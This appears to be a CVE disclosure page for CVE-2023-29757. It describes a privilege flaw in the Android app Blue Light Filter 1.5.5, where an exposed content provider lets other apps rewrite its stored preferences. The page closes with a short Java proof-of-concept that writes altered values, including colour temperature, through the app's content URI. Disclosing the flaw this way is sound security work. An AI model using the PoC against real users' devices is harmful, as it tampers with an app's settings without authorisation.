Headline
CVE-2023-29757: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Escalation of Privileges exists in Blue Light Filter(CVE-2023-29757)
Vendor: Leap Fitness Group(https://leap.app/)
Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)
Version: 1.5.5
Download link: https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter
Description of the vulnerability for use in the CVE:An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Additional information: The Blue Light Filter application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change the application’s color temperature by modifying the current_ct field in the SharedPreference file, causing the phone to display abnormally and resulting in an elevation of privilege attack.
poc:
public void attack_eye() { ContentResolver contentResolver = getContentResolver(); ContentValues contentValues = new ContentValues(); Uri uri = Uri.parse(“content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE_AUTHORITY/a/a”); contentValues.put("dim", 50); contentValues.put("filter_capacity", 100000); contentValues.put("language_index", -1);//设置语言 contentValues.put("current_ct", 600);//设置当前色温 contentResolver.insert(uri, contentValues); }